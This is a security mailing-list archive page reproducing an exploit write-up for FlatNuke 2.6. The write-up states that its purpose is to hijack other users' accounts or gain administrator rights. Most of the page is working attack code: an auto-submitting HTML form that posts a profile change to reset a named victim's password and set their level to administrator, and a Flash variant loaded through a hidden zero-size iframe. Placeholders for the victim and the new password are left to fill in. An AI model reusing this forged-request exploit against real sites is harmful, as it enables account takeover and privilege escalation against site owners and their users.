Arbitrary Command Inclusion

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

/* hackflatnuke.txt
 *
 * Tested on 2.6 FlatNuke version (can work on 3 but it has to be modified)
 *
 * With this trick you can steal/modifie a flatnuke account by changing the password and all the profile or change your profile and become an admin
 *
 * Requirements: - You have to know the nickname of the account u want to steal or change             
 *    
 */
 

HTML version  modifiable	
	
	
	<!-- flatnuke.html-->
	<html>
	<body>
	<title>Hack FlatNuke</title>
		<form method="POST" action="http://www.site.com/path_flatnuke/index.php?mod=none_Login";>
			<input type="hidden" name="action" value="saveprofile">
			<input type="hidden" name="user" value="VICTIM">
			<input type="hidden" name="regpass" value="NEW_PASS">
			<input type="hidden" name="anag" value="NAME">
			<input type="hidden" name="homep" value="VICTIM_SITE">
			<input type="hidden" name="prof" value="PROFESSION">
			<input type="hidden" name="prov" value="ORIGIN">
			<input type="hidden" name="ava" value="blank.png">
			<input type="hidden" name="url_avatar" value="">
			<input type="hidden" name="firma" value="VICTIM">
			<input type="hidden" name="level" value="LEVEL from 1 to 10 P.S. 10=administrator">
		</form>
	<script> document.body.onload = document.forms[0].submit(); </script>	
	</body>
	</html>
	<!-- Byez -->
	
	

Flash versione that you have to export in a swf and import in a iframe

exploit.swf


    var action:String = "saveprofile";
    var user:String = "nome_user_che_modifichiamo";
    var regpass:String = "nuova_pass";
    var anag:String = "nome";
    var homep:String = "sito_utente";
    var prof:String = "professione";
    var prov:String = "provenienza";
    var ava:String = "blank.png";
    var url_avatar:String = "";
    var firma:String = "firma_utente";
    var level:String = "livello da 1 a 10 N.B 10=amministartore";
    getURL("http://www.sito.com/path_flatnuke/index.php?mod=none_Login";, "_self", "POST");

    
hackflatnuke.html


    <html>
    <head>
    <title>Title</title>
    </head>
    <body bgcolor="000000">
    <center>
    <font face="Verdana" size="5" color="#FF0000">
    Hack FlatNuke
    </font>
    <br/>
    <br/>
    <iframe src="exploit.swf" frameborder="0" height="0" width="0"></iframe>
    </center>
    </body>
    </html>
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux